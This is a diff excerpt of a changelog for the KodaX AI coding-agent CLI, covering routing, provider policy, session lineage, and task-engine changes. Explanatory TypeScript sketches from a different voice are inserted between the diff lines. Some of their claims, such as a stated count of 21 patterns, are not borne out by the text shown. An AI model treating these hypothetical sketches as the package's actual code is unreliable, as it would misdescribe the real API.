+ - **New types**: `KodaXProviderUserAgentMode`, `ShellEnvRunner` utility type
1057
+ - **New tests**: Stream resilience (40+ lines), reasoning (75+ lines), task engine (470+ lines), error classification (25+ lines), retry handler (26+ lines), custom providers (104+ lines), InkREPL managed transcript (17+ lines), live streaming (43+ lines), transcript layout (81+ lines), CLI option helpers (47+ lines), ACP server (26+ lines), StatusBar (18+ lines), tool display (6+ lines), extension runtime (123+ lines), provider capability tests (77+ lines)
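The "null-delimited parsing with sentinel-based extraction" used for shell environment hydration can be sketched as follows. This assumes the login shell is asked to print a marker, then a NUL-separated environment dump, then the marker again; the sentinel string and the `parseShellEnvOutput` name are hypothetical.

```typescript
// Hypothetical marker; the actual sentinel used by the package is not documented here.
const ENV_SENTINEL = '__ENV_SENTINEL__';

// Extract the text between the first and last sentinel, then split it into
// NUL-delimited KEY=VALUE entries. Splitting on NUL rather than newlines keeps
// multi-line values intact, and the sentinels discard any banner text that
// shell profiles print before or after the dump.
function parseShellEnvOutput(stdout: string): Record<string, string> {
  const start = stdout.indexOf(ENV_SENTINEL);
  const end = stdout.lastIndexOf(ENV_SENTINEL);
  if (start === -1 || end === start) return {};
  const payload = stdout.slice(start + ENV_SENTINEL.length, end);
  const env: Record<string, string> = {};
  for (const entry of payload.split('\0')) {
    const separator = entry.indexOf('=');
    if (separator <= 0) continue; // skip empty entries and entries without a key
    env[entry.slice(0, separator)] = entry.slice(separator + 1);
  }
  return env;
}
```

Only the first `=` is treated as the separator, so values that themselves contain `=` survive unchanged.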
1058
+
1059
+ ### Changed
1060
+ - **Error classification unified**: Duplicated inline transient pattern checks replaced with `TRANSIENT_MESSAGE_PATTERNS` array and `matchesTransientMessage()` helper
1061
+ - **Retry delay abortable**: `withRetry()` now accepts optional `AbortSignal`; `waitForRetryDelay()` resolves immediately on abort instead of waiting for the full delay
1062
+ - **Tool preview length**: Truncation limit increased from 100 to 240 characters for better tool input visibility
1063
+ - **Managed task breadcrumb**: Added `round` phase support with note propagation
1064
+ - **Transcript layout enhanced**: Expanded with new row types and improved formatting
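The unified error classification above replaces scattered inline checks with one pattern table and one helper. A minimal sketch of that shape, assuming case-insensitive substring matching; the four patterns below are illustrative placeholders, since the changelog mentions 21 patterns without listing them, and the real entries may be regular expressions.

```typescript
// Illustrative subset only; not the package's actual pattern list.
const TRANSIENT_MESSAGE_PATTERNS: readonly string[] = [
  'econnreset',
  'socket hang up',
  'timed out',
  'aborted',
];

// A message is treated as transient (and therefore retryable) when it
// contains any known pattern, compared case-insensitively.
function matchesTransientMessage(message: string): boolean {
  const normalized = message.toLowerCase();
  return TRANSIENT_MESSAGE_PATTERNS.some((pattern) =>
    normalized.includes(pattern),
  );
}
```

Centralizing the table means a new transient pattern is added in one place instead of in every provider layer.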
1065
+
1066
+ ### Removed
1067
+ - **pi-docs directory**: Deleted obsolete `docs/pi-docs/` reference documentation (28 files, ~13k lines)
1068
+
1069
+ ### Documentation
1070
+ - **FEATURE_LIST.md**: Added FEATURE_045 (Provider Stream Resilience), updated tracked feature count to 45
1071
+ - **v0.7.15 feature design**: New design doc for FEATURE_045
1072
+
1073
+ ---
1074
+
1075
+ ## [0.7.12] - 2026-03-30
1076
+
1077
+ ### Fixed
1078
+ - Resolve mojibake (garbled text) in `kodax --help` output, CLI descriptions, and code comments across `kodax_cli.ts` — replaced 16 garbled strings with proper English text
1079
+ - Fix garbled CJK keyword regex in `reasoning.ts` by referencing existing clean pattern constants instead of inline mojibake
1080
+ - Replace separator with `→` in StatusBar routing/scout status display
1081
+ - Propagate CLI model selection through ACP bridge
1082
+
1083
+ ### Changed
1084
+ - Add `.npmrc` to pin `registry.npmmirror.com` for consistent lockfile across machines
1085
+
1086
+ ---
1087
+
1088
+ ## [0.7.11] - 2026-03-30
1089
+
1090
+ ### Added
1091
+ - **Skill-aware AMA role projection**: skill invocations now carry `skillInvocation` metadata into managed execution, `Scout` emits a `skill-map`, and AMA roles consume role-specific skill views instead of sharing the same raw skill prompt
1092
+ - **Skill artifacts for managed tasks**: managed workspaces now persist `skill-execution.md`, `skill-map.json`, and `skill-map.md`
1093
+ - **Same-role round summaries for non-generator roles**: `Scout`, `Planner`, and `Evaluator` now persist a compact previous-round summary that is re-injected on later rounds without restoring full private chat history
1094
+ - **Global work-budget approval loop**: AMA runs use a unified `globalWorkBudget` with repeated `+200` approval extensions near the 90% threshold
1095
+ - **Improved tool disclosure**: REPL tool summaries now prefer target path/scope/cmd details, including explicit `bash` command display
1096
+ - **Interrupted-response persistence test coverage**: new UI regression coverage for Ctrl+C persistence queuing
1097
+ - **FEATURE_044**: Durable Compression Anchors and Artifact Recall spec added to v0.8.0 feature docs
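The global work-budget approval loop can be pictured with a small immutable model. The `+200` extension and the 90% threshold come from the entry above; the `GlobalWorkBudget` fields and both function names are assumptions for illustration.

```typescript
// Values quoted from the changelog entry.
const EXTENSION_UNITS = 200;

// Hypothetical budget shape.
interface GlobalWorkBudget {
  cap: number;
  used: number;
}

// Approval is requested once usage reaches 90% of the cap.
// Integer arithmetic avoids floating-point rounding at the boundary.
function needsApproval(budget: GlobalWorkBudget): boolean {
  return budget.used * 10 >= budget.cap * 9;
}

// Each approval returns a new budget with the cap raised by 200 units;
// the input object is left untouched.
function extendBudget(budget: GlobalWorkBudget): GlobalWorkBudget {
  return { cap: budget.cap + EXTENSION_UNITS, used: budget.used };
}
```

Because extensions are repeatable, a long run simply passes through the threshold check again after each approved extension.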
1098
+
1099
+ ### Changed
1100
+ - **AMA simplified**: `H3_MULTI_WORKER`, default `Admission`, `Lead`, and `Contract Reviewer` were removed from the main runtime graph; AMA now operates with `H0_DIRECT`, `H1_EXECUTE_EVAL`, and `H2_PLAN_EXECUTE_EVAL`
1101
+ - **Routing ceilings tightened**: `read-only` and `docs-only` work now stay on `SA/H0` by default, may use `H1` only when the user explicitly asks for stronger checking, and can no longer enter `H2_PLAN_EXECUTE_EVAL`
1102
+ - **Repo scale semantics narrowed**: `reviewScale`, repo size, and changed-scope signals now shape evidence strategy only instead of forcing a heavier harness
1103
+ - **H2 default pass count reduced**: coordinated mutation work now starts with a single main pass and opens extra passes only after structured evaluator failure
1104
+ - **SA semantics clarified**: `SA` now bypasses AMA entirely and runs through the direct single-agent path
1105
+ - **Project + SA continuity clarified**: project-aware direct runs now persist a lightweight run record for status, latest summary, and next-step guidance without entering the managed-task graph
1106
+ - **Intent-first routing**: lightweight `conversation` / `lookup` inputs short-circuit before dirty-repo complexity can escalate them
1107
+ - **Scout and Planner evidence boundaries tightened**: Scout stays pre-harness, Planner is restricted to scope facts plus overview evidence, and Generator owns deep evidence passes
1108
+ - **Pre-Scout routing notes neutralized**: live AMA routing notes now stay provisional until Scout confirms the final harness
1109
+ - **Status bar semantics updated**: `Work used/total` is the primary AMA budget signal; `Round` appears only when a real extra pass exists; AMA no longer falls back to user-visible `Iter x/y`
1110
+ - **Evaluator public-answer contract tightened**: review answers are written directly for the user instead of narrating evaluator-vs-generator meta-review
1111
+ - **Command metadata parity improved**: builtin commands now align more closely with discovered command metadata fields
1112
+ - **Core docs refreshed**: HLD, DD, ADR, PRD, feature designs, and roadmap notes now match the current SA/AMA/skill architecture
1113
+
1114
+ ### Fixed
1115
+ - Interrupted managed tasks now filter empty/control-plane placeholder evidence from transcript rendering and queue the last visible response for background persistence
1116
+ - Mixed lookup/actionable prompts no longer short-circuit onto the pure lookup path
1117
+ - H1 revise no longer auto-escalates on the first evaluator retry
1118
+ - H1 read-only Generator now receives both runtime write guards and explicit prompt guidance to stay non-mutating
1119
+ - Scout downshifts now complete as Scout-owned `H0_DIRECT` runs instead of handing off to a second direct agent or leaking scout-flavored output
1120
+
1121
+ ### Tests
1122
+ - Added / expanded tests for `task-engine`, `reasoning`, `tool-display`, `live-streaming`, `StatusBar`, `invocation-runtime`, `types-legacy`, and `InkREPL.interrupted`
1123
+
1124
+ <!-- last-sync: HEAD -->
1125
+
1126
+ ### Added
1127
+ - **Repository intelligence substrate (FEATURE_018)**: Task-aware repository intelligence layer under `.agent/repo-intelligence/` with durable artifacts — `repo-overview.json`, `changed-scope.json`, `module-index.json`, `symbol-index.json`, `process-index.json`, `repo-intelligence-manifest.json` — supporting incremental refresh, freshness metadata, and language-tiered extraction (TS/JS via AST, Python, Go, Rust, Java, C++)
1128
+ - **Intelligence query surfaces**: Six first-class retrieval tools — `repo_overview`, `module_context`, `symbol_context`, `process_context`, `impact_estimate`, `changed_scope` — returning structured capsules with freshness, confidence, evidence, and progressive disclosure (FEATURE_028)
1129
+ - **Repo-intelligence tools**: `repo-overview.ts`, `module-context.ts`, `symbol-context.ts`, `process-context.ts`, `impact-estimate.ts`, `changed-scope.ts`, `internal.ts`, and `query.ts` in `packages/coding/src/tools/` and `packages/coding/src/repo-intelligence/`
1130
+ - **Adaptive multi-agent mode toggle (FEATURE_027)**: Persistent `agentMode` setting (`sa`/`ama`) with CLI (`--agent-mode`), REPL (`/agent-mode`), and keyboard shortcut (`Alt+M`) entry points; status bar shows `KodaX - SA` or `KodaX - AMA`
1131
+ - **SA mode execution constraint**: Single-Agent mode clamps execution to single-agent path while preserving task routing, metadata, and managed-task artifacts — reducing token cost
1132
+ - **`--team` deprecation**: `--team` removed from main product surface, retained as deprecated compatibility path that warns and refuses execution
1133
+ - **Agent mode shortcut**: `Alt+M` default shortcut for runtime SA/AMA toggle with command fallback
1134
+ - **Prompt-time intelligence injection**: Automatic active-module and active-impact injection for edit/review/refactor flows via `buildPromptOverlay()`
1135
+ - **Routing enrichment**: `stabilizeRoutingDecision()` now consumes lightweight repo-intelligence signals to raise complexity, bias planning, and choose safer harness profiles
1136
+ - **Task evidence snapshots**: Managed tasks persist task-scoped retrieval snapshots (repo overview, changed scope, active module, impact) into evidence bundles
1137
+ - **New types**: Intelligence capsule types, confidence tiers, freshness metadata, language capability tiers in `@kodax/coding` and `@kodax/ai`
1138
+ - **New tests**: Repo-intelligence tool tests, reasoning tests for intelligence-aware routing, agent mode tests, status bar mode display tests, shortcut tests
1139
+
1140
+ ### Changed
1141
+ - **CLI entry points**: `kodax_cli.ts` updated for `--agent-mode` flag and deprecated `--team` handling
1142
+ - **Reasoning pipeline expanded**: `reasoning.ts` (+495 lines) enriched with repo-intelligence signals, language-tiered extraction, and low-confidence fallback guidance
1143
+ - **Task engine expanded**: `task-engine.ts` (+2645 lines) with intelligence query integration, evidence snapshot persistence, and managed-task lifecycle enrichment
1144
+ - **Orchestration updated**: `orchestration.ts` refactored for intelligence-aware task dispatch and SA mode constraint propagation
1145
+ - **REPL UI updated**: `InkREPL.tsx` gains agent mode display, mode toggle handling, and mode-aware rendering; `StatusBar` shows current agent mode
1146
+ - **Session storage**: `storage.ts` gains `agentMode` persistence in session metadata
1147
+ - **Provider registry**: Provider capability checks updated for intelligence-query-aware policy evaluation
1148
+ - **Documentation**: v0.7.0, v0.8.0, v0.9.0 feature docs, FEATURE_LIST, KNOWN_ISSUES, and feature README updated for FEATURE_018, FEATURE_027, and FEATURE_028
1149
+
1150
+ ---
1151
+
1152
+ ## [0.7.5] - 2026-03-26
1153
+
1154
+ ### Added
1155
+ - **Task engine (FEATURE_022)**: `runManagedTask()` in `packages/coding/src/task-engine.ts` — full managed task lifecycle with contract creation, role assignment, evidence collection, and orchestration verdict; integrates with `runOrchestration` for multi-worker task execution
1156
+ - **Task contract types**: `KodaXTaskContract`, `KodaXTaskRoleAssignment`, `KodaXTaskWorkItem`, `KodaXTaskEvidenceArtifact`, `KodaXTaskEvidenceEntry`, `KodaXTaskEvidenceBundle`, `KodaXOrchestrationVerdict`, `KodaXManagedTask` in `@kodax/coding`
1157
+ - **Task context types**: `KodaXTaskCapabilityHint`, `KodaXTaskVerificationContract`, `KodaXTaskToolPolicy` for structured verification and tool policy contracts
1158
+ - **Task surface tracking**: `KodaXTaskSurface` type (`cli`/`repl`/`project`/`plan`) propagated through execution context to identify managed task entry points
1159
+ - **Session scope**: `KodaXSessionScope` (`user`/`managed-task-worker`) on `KodaXSessionData` and `KodaXSessionMeta` for worker session identification; `scope` option on `KodaXSessionOptions`
1160
+ - **Project control state**: `ProjectControlState` interface and `createProjectControlState()` factory for tracking workflow mutations separately from derived workflow state
1161
+ - **Managed task persistence**: `ProjectStorage` read/write for managed task artifacts (`managed-task.json`) and control state (`control-state.json`)
1162
+ - **JSON guards**: Type guards for `ProjectControlState`, `KodaXManagedTask`, `KodaXTaskVerificationContract`, `KodaXTaskToolPolicy`, `KodaXTaskCapabilityHint` in `json-guards.ts`
1163
+ - **Orchestration abort propagation**: `AbortSignal` threading from `runOrchestration` options through task runners to agent execution; `mergeAbortSignals()` utility for composite abort handling with `AbortSignal.any` fallback
1164
+ - **Orchestration task cancellation**: `buildCancelledTaskResult()` and early-exit loop when external abort signal fires, marking all pending tasks as blocked
1165
+ - **Task runner hooks**: `createOptions` and `onResult` callbacks on `CreateKodaXTaskRunnerOptions` for per-task option customization and post-result side effects
1166
+ - **New tests**: Task engine integration tests, orchestration abort tests, project storage managed task tests, project harness control state tests, storage scope tests, CLI option helper tests
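One plausible reading of the `mergeAbortSignals()` entry is a helper that uses the native `AbortSignal.any` when the runtime provides it and otherwise wires the signals together by hand. The sketch below follows that reading; the signature and the handling of `undefined` inputs are assumptions, not the package's actual API.

```typescript
// Combine several optional signals into one that aborts as soon as any
// source aborts. Returns undefined when there is nothing to merge.
function mergeAbortSignals(
  signals: Array<AbortSignal | undefined>,
): AbortSignal | undefined {
  const active = signals.filter(
    (signal): signal is AbortSignal => signal !== undefined,
  );
  if (active.length === 0) return undefined;
  if (active.length === 1) return active[0];

  // Prefer the native static method when available (newer runtimes only).
  const nativeAny = (
    AbortSignal as unknown as { any?: (input: AbortSignal[]) => AbortSignal }
  ).any;
  if (typeof nativeAny === 'function') {
    return nativeAny.call(AbortSignal, active);
  }

  // Manual fallback: forward the first abort to a fresh controller.
  const controller = new AbortController();
  for (const signal of active) {
    if (signal.aborted) {
      controller.abort(signal.reason);
      break;
    }
    signal.addEventListener('abort', () => controller.abort(signal.reason), {
      once: true,
    });
  }
  return controller.signal;
}
```

A caller would typically pass the external signal from orchestration options together with a per-task signal, then hand the merged result to the agent run.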
1167
+
1168
+ ### Changed
1169
+ - **CLI entry points use `runManagedTask`**: `kodax_cli.ts` replaced `runKodaX` with `runManagedTask` for all execution paths (direct, command, print) with `taskSurface: 'cli'`
1170
+ - **Project commands use `runManagedTask`**: `/project next` and `/project auto` now execute via `runManagedTask` with project surface, feature metadata, and verification contracts
1171
+ - **Workflow state derivation refactored**: `ProjectStorage.inferWorkflowState` replaced with `deriveWorkflowState` that considers control state, alignment truth, and managed task status for more accurate stage inference
1172
+ - **Project harness verification integration**: Verification results now map to managed task verdict (`completed`/`blocked`) and update evidence entries with signals
1173
+ - **Control state propagated**: Discovery, planning, and execution commands now use `saveProjectControlState` instead of directly mutating workflow state
1174
+
1175
+ ### Documentation
1176
+ - **ADR, DD, HLD, PRD**: Updated architecture decision records, design document, high-level design, and product requirements for FEATURE_022 task engine
1177
+ - **Feature design docs**: v0.7.0, v0.8.0, v0.9.0, v1.0.0 feature documents updated for task engine integration and dependency tracking
1178
+ - **FEATURE_LIST.md**: Updated with FEATURE_022 progress and cross-feature dependency references
1179
+
1180
+ ---
1181
+
1182
+ ## [0.7.4] - 2026-03-26
1183
+
1184
+ ### Added
1185
+ - **Task complexity inference (FEATURE_025)**: Weighted keyword scoring across 4 tiers — `simple`, `moderate`, `complex`, `systemic` — with language-aware Chinese and English keyword sets; cross-referenced with task type, risk level, and work intent for calibrated results
1186
+ - **Work intent detection**: `inferWorkIntent()` classifies requests as `append`, `overwrite`, or `new` based on explicit keyword signals; destructive interpretation preferred when append and rewrite language conflict
1187
+ - **Brainstorm trigger**: `inferRequiresBrainstorm()` detects ambiguity that warrants option framing — triggered by brainstorm keywords, low-confidence unknown tasks, systemic complexity, or high-risk overwrites
1188
+ - **Harness profile selection**: `selectHarnessProfile()` maps routing decisions to 4 execution profiles (`H0_DIRECT`, `H1_EXECUTE_EVAL`, `H2_PLAN_EXECUTE_EVAL`, `H3_MULTI_WORKER`) based on task characteristics; automatically downgrades to H1/H2 on lossy bridge providers with recorded routing notes
1189
+ - **Harness profile prompt overlays**: Dedicated system prompt fragments for each harness profile that guide the LLM's execution strategy
1190
+ - **Tied task resolution**: `resolveTiedTask()` breaks score ties by checking for explicit directive keywords (review, fix, plan) in the prompt, falling back to `unknown` when no clear winner exists
1191
+ - **Provider policy hints for decisions**: `buildProviderPolicyHintsForDecision()` converts a routing decision into policy hints — `harnessProfile`, `evidenceHeavy`, `brainstorm`, `workIntent` — threaded through execution context for downstream policy evaluation
1192
+ - **Harness-aware provider policy rules**: New block/warn rules for `H3_MULTI_WORKER` (blocked on lossy/stateless providers, warned on limited) and `H2_PLAN_EXECUTE_EVAL` (warned on bridge/lossy providers)
1193
+ - **Routing decision on KodaXResult**: `routingDecision` field on `KodaXResult` exposes the final visible routing decision including harness profile and work intent to callers
1194
+ - **Extended KodaXProviderPolicyHints**: New `harnessProfile`, `brainstorm`, and `workIntent` fields for context-aware policy evaluation
1195
+ - **New types**: `KodaXTaskComplexity`, `KodaXTaskWorkIntent`, `KodaXHarnessProfile` in `@kodax/ai`; re-exported through `@kodax/agent` and `@kodax/coding`
+ - **Extended routing decision**: `KodaXTaskRoutingDecision` gains `complexity`, `workIntent`, `requiresBrainstorm`, `harnessProfile`, and optional `routingNotes` fields
+ - **New tests**: 10 new reasoning tests (append/overwrite intent, brainstorm triggers, complexity tiers, H3 harness selection, provider downgrade, policy hints, tied task resolution), 2 new provider-policy tests (H3 block, H2 warn), expanded agent policy integration tests
+
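The harness-aware provider policy rules in the list above can be pictured with a small TypeScript sketch. It only encodes the rules as stated in this changelog (`H3_MULTI_WORKER` blocked on lossy/stateless providers and warned on limited ones; `H2_PLAN_EXECUTE_EVAL` warned on bridge/lossy providers). The function name `evaluateHarnessRule`, the `ProviderLevel` union, and the `isBridge` flag are assumptions made for illustration, not the actual `provider-policy.ts` code.

```typescript
type HarnessProfile =
  | "H0_DIRECT"
  | "H1_EXECUTE_EVAL"
  | "H2_PLAN_EXECUTE_EVAL"
  | "H3_MULTI_WORKER";

// Assumption: a single coarse capability level per provider.
type ProviderLevel = "full" | "limited" | "lossy" | "stateless";
type PolicyStatus = "allow" | "warn" | "block";

// Hypothetical provider description used only by this sketch.
interface ProviderTraits {
  level: ProviderLevel;
  isBridge: boolean;
}

function evaluateHarnessRule(
  profile: HarnessProfile,
  provider: ProviderTraits,
): PolicyStatus {
  if (profile === "H3_MULTI_WORKER") {
    // Multi-worker execution is blocked on lossy or stateless providers.
    if (provider.level === "lossy" || provider.level === "stateless") {
      return "block";
    }
    // Limited providers may proceed, but with a warning.
    if (provider.level === "limited") {
      return "warn";
    }
  }
  if (profile === "H2_PLAN_EXECUTE_EVAL") {
    // Plan/execute/eval is allowed on bridge or lossy providers, with a warning.
    if (provider.isBridge || provider.level === "lossy") {
      return "warn";
    }
  }
  return "allow";
}
```

For example, `evaluateHarnessRule("H3_MULTI_WORKER", { level: "stateless", isBridge: true })` yields `"block"` in this sketch, while the same provider under `H0_DIRECT` is allowed.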
+ ### Changed
+ - **`stabilizeRoutingDecision` enriched**: Now runs full inference pipeline — work intent, complexity, brainstorm, harness profile — on every routing decision (fallback and LLM-routed) instead of only handling edge cases
+ - **Prompt overlay expanded**: `buildPromptOverlay()` now includes harness profile, work intent guidance, brainstorm trigger, and routing notes alongside the existing execution mode and task routing fields
+ - **Auto-reroute preserves enriched decision**: `maybeCreateAutoReroutePlan()` threads provider policy through `stabilizeRoutingDecision` so enriched fields are recalculated on reroute
+ - **Policy evaluation context passed to streaming**: `evaluateProviderPolicy` call in agent loop now receives `effectiveOptions` and `context` separately for accurate hint resolution
+ - **Agent loop threads routing decision to result**: All exit paths in `runKodaX` (success, error, cancel, yield, limit) now include `routingDecision` on the result
+ - **Provider policy hints threaded through execution context**: `buildReasoningExecutionState` injects `buildProviderPolicyHintsForDecision` into context's `providerPolicyHints` so downstream calls see the routing-derived hints
+ - **Router system prompt expanded**: LLM task router now accepts and validates `complexity`, `workIntent`, `harnessProfile`, `requiresBrainstorm`, and `routingNotes` fields
+
+ ---
+
+ ## [0.7.3] - 2026-03-26
+
+ ### Changed
+ - **Message fingerprint caching**: `messagesEqual()` now uses a `WeakMap`-based fingerprint cache to avoid repeated `JSON.stringify` during lineage reconciliation, reducing deduplication cost for repeated calls
+ - **Fork session ID generation**: `MemorySessionStorage.fork()` uses `generateSessionId()` from `@kodax/coding` instead of a timestamp-based fallback for consistent session ID format
+ - **Guard reporter extraction**: Duplicated session transition guard callback in `InkREPL.tsx` extracted into shared `logSessionTransitionGuard()` helper
+
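The message fingerprint caching entry above describes a general pattern that can be sketched as follows. This is a minimal illustration, assuming messages are plain objects that are not mutated after their first comparison; the `Message` shape and the `fingerprint` helper are hypothetical, and the real `messagesEqual()` may differ in detail.

```typescript
// Hypothetical message shape, for illustration only.
interface Message {
  role: string;
  content: unknown;
}

// WeakMap keys are held weakly, so cached fingerprints are released
// together with the message objects they describe.
const fingerprintCache = new WeakMap<object, string>();

function fingerprint(message: Message): string {
  const cached = fingerprintCache.get(message);
  if (cached !== undefined) {
    return cached;
  }
  // Serialize once per object; later comparisons reuse the cached string.
  const computed = JSON.stringify(message);
  fingerprintCache.set(message, computed);
  return computed;
}

function messagesEqual(a: Message, b: Message): boolean {
  // Identity check first, then compare the cached fingerprints.
  return a === b || fingerprint(a) === fingerprint(b);
}
```

One trade-off of this approach: a cached fingerprint becomes stale if a message object is mutated in place, so the sketch is only safe when messages are treated as immutable. `JSON.stringify` is also sensitive to property order, so two messages with the same fields in a different order compare as unequal here.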
+ ### Added
+ - **API documentation**: JSDoc comments added to all exported session lineage functions (`createSessionLineage`, `getSessionLineagePath`, `getSessionMessagesFromLineage`, `resolveSessionLineageTarget`, `setSessionLineageActiveEntry`, `appendSessionLineageLabel`, `forkSessionLineage`, `buildSessionTree`, `countActiveLineageMessages`)
+ - **New session lineage tests**: Empty-lineage edge case, fork from the active leaf without a selector, skipping branch summaries when `summarizeCurrentBranch` is disabled, null returns for a missing selector, and orphaned entries rendered as separate roots
+
+ ---
+
+ ## [0.7.2] - 2026-03-26
+
+ ### Added
+ - **Session lineage tree (FEATURE_019)**: `packages/agent/src/session-lineage.ts` — branchable session history with parent-child entry relationships, automatic deduplication, and immutable data structures; supports four entry types: `message`, `compaction`, `branch_summary`, and `label`
+ - **Session tree visualization**: `formatSessionTree()` renders the lineage as a tree with branch indicators, active-path markers, entry IDs, and optional checkpoint labels
+ - **Branch-and-continue navigation**: `setSessionLineageActiveEntry()` navigates to any tree node by entry ID or label; automatically summarizes abandoned branches into `branch_summary` entries for context preservation
+ - **Checkpoint labels**: `appendSessionLineageLabel()` attaches lightweight bookmark labels to any tree node; resolved via `getResolvedLabels()` with last-wins semantics and support for clearing labels
+ - **Session forking**: `forkSessionLineage()` deep-clones a branch path into an independent lineage with new entry IDs and preserved labels, enabling parallel exploration without mutating the source session
+ - **`/tree` REPL command**: Inspect, navigate, and label session branches — `/tree` displays the tree, `/tree <selector>` jumps to a node, `/tree label` and `/tree unlabel` manage checkpoint labels
+ - **`/fork` REPL command**: Export a branch into a new independent session file, optionally from a specific tree node
+ - **Session transition guardrails**: `evaluateSessionTransitionPolicy()` checks provider capability (session support) before session load, branch switch, or fork operations; blocks operations on stateless providers, warns on limited support
+ - **Extended `KodaXSessionStorage` interface**: New optional methods `getLineage`, `setActiveEntry`, `setLabel`, and `fork` for storage backends to support lineage operations
+ - **Session data model additions**: `KodaXSessionLineage`, `KodaXSessionEntry` (4 variants), `KodaXSessionNavigationOptions`, `KodaXSessionTreeNode` types; `KodaXSessionData` gains optional `lineage` field; `KodaXSessionMeta` gains lineage metadata fields
+ - **Lineage-aware JSONL persistence**: `storage.ts` reads and writes `lineage_entry` records alongside `meta` and `extension_record` lines; backward-compatible migration from legacy flat message arrays via `createSessionLineage()`
+ - **Lineage-aware session storage utilities**: `session-storage.ts` (Ink) and `MemorySessionStorage` (readline) both support lineage operations with `structuredClone` for immutability
+ - **Lineage-aware session listing**: `list()` reports active branch message count via `countActiveLineageMessages()` when lineage is present
+ - **Lineage storage helpers in project-harness**: `readLineageCheckpoints`, `readLineageSessionNodes`, `appendLineageCheckpoint`, `appendLineageSessionNode` with backward-compatible aliases
+ - **Project harness record schema additions**: `ProjectHarnessCheckpointRecord` and `ProjectHarnessSessionNodeRecord` gain `id` and `taskId` fields for lineage tracking
+ - **New tests**: `session-lineage.test.ts`, `session-tree-command.test.ts`, `session-guardrails.test.ts`, expanded `storage.test.ts`
+
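The checkpoint-label entry above mentions last-wins resolution with support for clearing labels. A minimal sketch of that idea follows, assuming label entries are appended in order and that a `null` label clears an earlier one; the `LabelEntrySketch` shape and the `resolveLabelsSketch` name are hypothetical and do not reflect the real `getResolvedLabels()` signature.

```typescript
// Hypothetical append-only label record. Assumption: `label: null`
// means "clear whatever label this node currently has".
interface LabelEntrySketch {
  type: "label";
  targetId: string;
  label: string | null;
}

function resolveLabelsSketch(
  entries: readonly LabelEntrySketch[],
): Map<string, string> {
  const resolved = new Map<string, string>();
  // Entries are processed in append order, so a later entry for the
  // same node overrides an earlier one (last-wins).
  for (const entry of entries) {
    if (entry.label === null) {
      resolved.delete(entry.targetId);
    } else {
      resolved.set(entry.targetId, entry.label);
    }
  }
  return resolved;
}
```

Keeping labels as appended entries rather than mutating tree nodes fits the immutable, append-style lineage described above: relabeling or clearing a checkpoint never rewrites history, it only adds a newer record.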
+ ### Changed
+ - **`loadSession` callback returns typed status**: `Promise<boolean>` replaced with `Promise<SessionLoadStatus>` (`loaded`/`missing`/`blocked`) to distinguish missing sessions from provider-guarded blocks
+ - **`deleteAll` scoped by git root**: `deleteAll()` now accepts optional `gitRoot` parameter for project-scoped session cleanup
+ - **Session save preserves extension state**: Both storage backends merge existing `extensionState` and `extensionRecords` on save for incremental updates
+ - **Session load returns cloned data**: `load()` now returns `structuredClone` to prevent accidental mutation of cached session state
+ - **Project harness persistence method rename**: Internal storage methods migrated to lineage-aware naming; old names kept as backward-compatible aliases
+
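To illustrate why a typed load status is more useful than a boolean, here is a short sketch. It assumes `SessionLoadStatus` is a string-literal union of the three values named in the changelog; the `describeLoadResult` helper and its messages are hypothetical.

```typescript
// Assumption: the status is a string-literal union of these three values.
type SessionLoadStatus = "loaded" | "missing" | "blocked";

// Hypothetical caller-side helper: each outcome gets its own message,
// which a plain `boolean` result could not distinguish.
function describeLoadResult(
  status: SessionLoadStatus,
  sessionId: string,
): string {
  switch (status) {
    case "loaded":
      return `Resumed session ${sessionId}.`;
    case "missing":
      return `No session found with id ${sessionId}.`;
    case "blocked":
      return `Session ${sessionId} exists, but provider policy blocked loading it.`;
  }
}
```

With a `Promise<boolean>`, the `missing` and `blocked` cases would both collapse into `false`, and a caller could not tell the user whether to check the session ID or switch providers.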
+ ---
+
+ ## [0.7.1] - 2026-03-26
+
+ ### Added
+ - **Provider capability dimensions (FEATURE_029)**: Six new typed capability dimensions — `contextFidelity`, `toolCallingFidelity`, `sessionSupport`, `longRunningSupport`, `multimodalSupport`, `evidenceSupport` — added to `KodaXProviderCapabilityProfile` in `@kodax/ai`
+ - **Normalized capability profile**: `NormalizedKodaXProviderCapabilityProfile` type and `normalizeCapabilityProfile()` function ensuring all capability fields have explicit values with sensible defaults
+ - **Provider policy engine**: `packages/coding/src/provider-policy.ts` — `evaluateProviderPolicy()` evaluates provider constraints against task context (multimodal, MCP, long-running, project-harness, evidence-heavy, reasoning-control scenarios) and returns `block`/`warn`/`allow` decisions with routing notes
+ - **Policy-aware routing**: Provider policy wired into `createReasoningPlan()` and `buildPromptOverlay()` — routing prompts now include provider constraint notes; `buildRepositoryRoutingSummary` includes provider semantics for LLM routing decisions
+ - **Agent loop policy enforcement**: `evaluateProviderPolicy()` called in `runKodaX()` before streaming; `block` decisions throw errors, `warn` decisions append notes to system prompt
+ - **`/provider` REPL command**: Inspect provider capability matrix and common policy scenarios with color-coded block/warn/allow indicators; supports `/provider <name>[/<model>]` syntax
+ - **Provider capability snapshot helpers**: `getProviderCapabilitySnapshot`, `formatProviderCapabilityDetailLines`, `formatProviderSourceKind`, `getProviderCommonPolicyScenarios`, `getProviderPolicyDecision` in `@kodax/repl`
+ - **Provider policy types**: `KodaXProviderPolicyDecision`, `KodaXProviderPolicyIssue`, `KodaXProviderPolicyHint`, `KodaXProviderSourceKind` types in `@kodax/coding`
+ - **New tests**: `provider-policy.test.ts`, `agent.provider-policy.test.ts`, expanded `provider-capabilities.test.ts`; updated existing provider tests for 6 new capability fields
+
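The agent loop policy enforcement entry above (`block` decisions throw errors, `warn` decisions append notes to the system prompt) can be sketched roughly as below. The `PolicyDecisionSketch` shape, the `applyPolicyDecision` name, and the exact prompt wording are assumptions for illustration; the real `KodaXProviderPolicyDecision` type and `runKodaX()` logic are not shown in this changelog.

```typescript
// Hypothetical decision shape; the real policy decision type may differ.
interface PolicyDecisionSketch {
  status: "allow" | "warn" | "block";
  notes: string[];
}

function applyPolicyDecision(
  systemPrompt: string,
  decision: PolicyDecisionSketch,
): string {
  if (decision.status === "block") {
    // A blocked request never reaches the provider.
    throw new Error(
      `Provider policy blocked this request: ${decision.notes.join("; ")}`,
    );
  }
  if (decision.status === "warn" && decision.notes.length > 0) {
    // Warnings are surfaced to the model as extra system prompt notes.
    const noteLines = decision.notes.map((note) => `- ${note}`).join("\n");
    return `${systemPrompt}\n\nProvider constraints:\n${noteLines}`;
  }
  return systemPrompt;
}
```

Running the check before streaming, as the entry describes, means a `block` fails fast without spending tokens, while a `warn` lets the request proceed with the constraint visible to the model.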
+ ### Changed
